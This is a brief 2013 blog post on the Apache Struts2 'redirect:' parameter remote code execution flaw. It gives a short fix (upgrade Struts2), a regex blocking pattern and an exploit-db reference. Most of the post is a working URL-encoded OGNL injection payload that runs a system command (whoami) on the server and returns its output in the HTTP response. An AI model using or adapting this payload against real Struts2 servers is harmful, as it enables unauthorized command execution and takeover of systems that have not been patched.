Friday 19 July 2013

Apache Struts2 include Params Remote Code Execution

It be able to get system permissions, An attacker could execute commands.

http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D


Solution:
 - Upgrade Version Struts2
 - Blocking Pattern Regex
   (.*)(redirect|action)(.*)java(.|%2e)lang(.|%2e)ProcessBuilder(.*)com(.|%2e)opensymphony(.*)

Reference: http://www.exploit-db.com/exploits/25980/
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)